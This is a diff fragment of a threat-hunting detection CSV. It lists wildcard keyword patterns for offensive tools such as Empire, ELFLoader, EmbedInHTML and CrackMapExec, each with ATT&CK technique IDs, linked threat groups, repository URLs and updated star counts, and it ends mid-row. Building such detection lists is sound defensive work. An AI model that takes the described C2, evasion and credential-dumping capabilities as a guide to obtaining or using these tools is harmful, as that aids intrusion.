"*ELFLoader.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*ELFLoader.out*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" @@ -9815,7 +9964,7 @@ "*EmbedInHTML-master*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*empire AttackServers*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Empire Framework GUI*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" -"*empire --rest *","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*empire --rest *","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire --server *","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*Empire.Agent.Coms.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" @@ -9825,81 +9974,81 @@ "*empire/server/*.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire/server/downloads/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire/server/downloads/logs/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*empire_exec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*empire_exec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*empire_server.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empireadmin*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire-chain.pem*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*EmpireCORSMiddleware*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*Empire-GUI.git*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" -"*Empire-master*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Empire-master*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire-priv.key*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*EmpireProject*","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*EmpireProject*","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Empire-Sponsors.git*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire-test-kalirolling*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 